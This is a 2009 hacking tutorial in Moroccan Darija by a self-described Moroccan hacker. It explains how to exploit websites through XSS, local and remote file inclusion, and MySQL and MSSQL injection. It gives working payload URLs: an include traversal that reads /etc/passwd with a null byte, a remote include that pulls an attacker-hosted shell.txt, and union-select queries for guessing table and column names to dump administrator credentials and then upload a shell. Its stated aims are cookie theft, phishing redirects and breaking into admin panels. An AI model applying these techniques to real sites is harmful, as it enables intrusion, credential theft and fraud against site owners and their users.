##################################################################### ## _______ ____ ## ## __ ___ / _____ \ / __ \ ## ## / \ _ _ ___ | |___ |/ | | ) ) ## ## | Y Y \| V_\ / _ Y| __ |(_)| |_/ / [A] ## ## |__|__|__ \ | ()| (_] | | \|| || __ \ ## ## \/_/ \___ | | | || | ) | ## ## \|/ |_/|_/ |/ ## ## ## ##################################################################### ## [Morocco] Web Vulnerabilities Exploiting ## ## -+-+-+-+-+- ## ## Created By Mr.aFiR (Moroccan Hacker) ## ## Email: q-_@hotmail.com ## ## Website: www.aFiR.me ## ## (c) -- 18/12/2oo9 ## ##################################################################### # To read this with a good style, use Notepad++ & select the from language menu "MS INI file". # Bach t9raw had fichier b style zwin, halloh b notepad++ & diro f language "MS INI file". # ##-Mohtawayate | # | #-M09DIMA | #-3ARD | | # | | #-XSS (all) | | #-LFI (php) | | #-RFI (php) | | #-MySQLi (php) | | #-MsSQLi (asp,aspx) | | | #-KHATIMA | #-L3z | |-> Bismy Allah nbdaw : [!] I. M09ADIMA : Ch7al men merra tan dakhlo l chi site tay tla3 lina fih error o matan fahmo fih walo (hada bansba l chi nass :) ). Lyom jina n7abso had l problème. bach twaliw t3arfo kifache t3amlo m3a les error khossosan f PHP. Yallah khaliwna nbdaw 3ala barakati Allah. [!] II. 3ARD : [~] a. XSS (all): XSS (Cross Site Scripting) howa ashal tagharat & li kayna f bzaf d les sites li menhom des sites kbar bhal les banks ola charikat l kbar comme hotmail & facebook. O had XSS sahla 7ddar 39lak chwiya m3aya : Ex.: parfois tanl9aw chi lien b7al hakka : http://server/login.php?message=Invalid Login & tanl9aw dik "Invalid Login" maktooba f chi blasa f la page. Hadchi tay3ni ananna n9dro nt7kmo fiha & nghayroha ri men lien. njarbo : http://server/login.php?message= ila mchat 7ta 3ta fenetre dial message fih "aFiR" rah hadik hiya li tatsma XSS, 7it biha imkan lik tddi les cookies dial l admin ola users dial chi site. Lmanafi3 dial XSS : * tchfar biha les cookies (Cookies Stealing) * tdir fiha iframe dial login (iframe Attacks) * dir biha redirection l scam dialk (Phishing Redirections) Hadi Salina M3aha, Ntmnna annak fhamti chi haja, sinon chrab lb7ar. [~] b. LFI (php): LFI (Local File Include) hadi chwiya 3yana mais wakha hakkak naf3a f ba3d servers hit biha imkan lina n9raw ay fichier bchart maykonch PHP. Ex.: http://server/index.php?lang=fr hadi tanradoha : http://server/index.php?lang=aFiR Ila 3tak error bhal hakka : Warning : include('languages/aFiR.php') .../home/user/www/index.php on line x require('languages/aFiR.php') .../home/user/www/index.php on line x rah imkan t exploitih & t9ra "/etc/passwd" http://server/index.php?lang=../../../../etc/passwd%00 ila kan safe_mode=OFF rah radi ikharjo lik les users dial server & dik "%00" hiya bach tan raddo ".php" NULL y3ni matatb9ach Lmanafi3 dial had l Vuln hiya anana n9raw /etc/passwd & nkhadmo bih FTP Burte Force Attack li biha imkan njibo des login FTP. Ila mafhamti hadi Tfi dak l pc o nod men temma | YALLAH! | :D [~] c. RFI (php): FRI (Remote File Include) hadi 3akss lowla, hadi fiha imma byad imma khal. fl error dialha matykon hta dossier & imkan aussi hna ndiro LFI. Ex.: http://server/index.php?page=news tanradoha : http://server/index.php?page=aFiR tat3ti error comme ça : Warning : include('aFiR.php') ... Warning : require('aFiR.php') ... hada tay3ni imkan tkon RFI nraj3o l lien : http://server/index.php?page=http://hacker/shell.txt? ila t executa lik shell llah iskhar, sinon rah Safe_mode=ON :s & bach nraj3o ".php" NULL f RFI tan diro "?" f la fin d lien [~] d. MySQLi (php): MySQL Injection i9dar tjikom s3iba ila ma3mrkom khdamtoha, mais hiya raha sahla. Mli tadkhol l chi site matala f lien dial /news.php?id=9 malli trad lien /news.php?id=9' radi itla3 error ! ja men ana l mobarmij ma3tach chorot l $id ! & ktab direct bhal haka : $query = mysql_query("SELECT * FROM news WHERE id=$id"); y3ni imkan lina nghayro lmasar dial had l query & biha njibo login dial admin awal haja tan9albo 3la 3adad la3mida li radi n diro ba3d "union select" tandiro /news.php?id=9 order by 1-- Onb9aw radyin tal3ni tanzido f dik "1" hta itla3 l error example tla3 error mli wslna "14" 3adad la3mida howa "13" daba hna 3arfin blli "13" howa 3adad l a3mida tandiro : /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- daba radi n3arfo la3mida lmosaba ohiya l ar9am li radi tban f la page daba tayji dawr dial ta5min dial name dial table fach kayn login dial l admin /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from table_name-- table_name tan 5amnoh men rassna i9dar ikon admin, users, user, administrator ... mli tanjarbo f ta5min kif i5tafi l error = rah ta5min S7i7 ;) Après ja ta5min dial login ol password dial admin, example 4 tayban f la page: /news.php?id=-9 union select 1,2,3,col_name,5,6,7,8,9,10,11,12,13 from table_name-- col_name hiya ta5min dial login ola password : Login : login, user, username, user_name, name, auth,... Password : password, pass, passwd,... Aprés matan 3arfo login tan9albo 3la Admin Panel li menha imkan n uploadiw shell dialna. ______________________________________________________________________________________________ |* Hado des commandes khassin ri b MySQL : | |_____________________________________________________________________________________________| | version() = tan3arfo biha la version dial Mysql server | | datadir() = tan3arfo biha l masar dial mysql f server | | concat() = tandamjo biha bzaf d la3mida f 1 L3amood Ex: concat(user,0x3a,pass) | | load_file()= tan9raw biha les fichier Ex: load_file('/etc/passwd') | |_____________________________________________________________________________________| [~] e. MsSQLi (asp,aspx): Bnesba l MsSQLi (MicroSoft SQL injection) tan tab3o nafss les etape dial MySQLi ri chi chorot : 1. "union select" = "union all select" (far9 bsiit). 2. "--" = "#" (partya dial commentaire bach n anulliw ma ba3d la query dialna). 3. F MsSQL les numero dial la3mida li m infectyin mataybanoch hta nkhamno table_name. 4. F hna matan khadmoch b les command dial mysql li 3titkom f lfo9. Daba Salina, Lmli7 Ba3 Ora7. [!] III. KHATIMA : Ntmnna annakom fhamto chi haja fhad l cours d darija :) ! Ktabt dinmo bhal incha2 dial Arabic :D ! Li mafham ttawzza il7ag mo 7san lih ! YALLAH L7AG MOK ! hhhhhhhhh 9addit had Ze3t b darij awalan bach ifahmo wlad l blad & tanian bach hta chi 9rd men dok L9rooda hachakom mayfham iwalliw ki LHmir (cambo mayfham walo) :) khashom ri lodnin. Akhir Haja radi tnod men dak l pc radi tamchi tn3ass onta tatfkar f hadchi kif tfi9 sbbaH 3la l pc & 7awel tjrab ga3 ach dkhalti l rassk, iwa nod men temma 9bal man khraj lik men l ecran :D. Yallah Tla7o ! [!] IV. L3z : L3z lik olga3 li 9ra had l paper & ntmna i3jabkom & tfahmoh mzian. LLi mafham chi 7aja ra l website dialy sift menno ton message ;) Finally, L3z to all my friends lli menhom : "Dr.Crypter(3chiri), Love511(3ami), Dr.BoB-Hacker(sadi9i), ****(MyLove)..." Li nsit madert smito hna, maykhafch rakom fl bal ;) Nchofkom Next Time m3a chi haja jdida ;) --------------------------------------------------------------------------------------------------- [x] Author : aFiR Abdel (Mr.aFiR) [x] Email : q-_[at]hotmail[dot]com [x] Website : www.aFiR.me # if you have something to tell me, only contact me ;) ---------------------------------------------------------------------------------------------------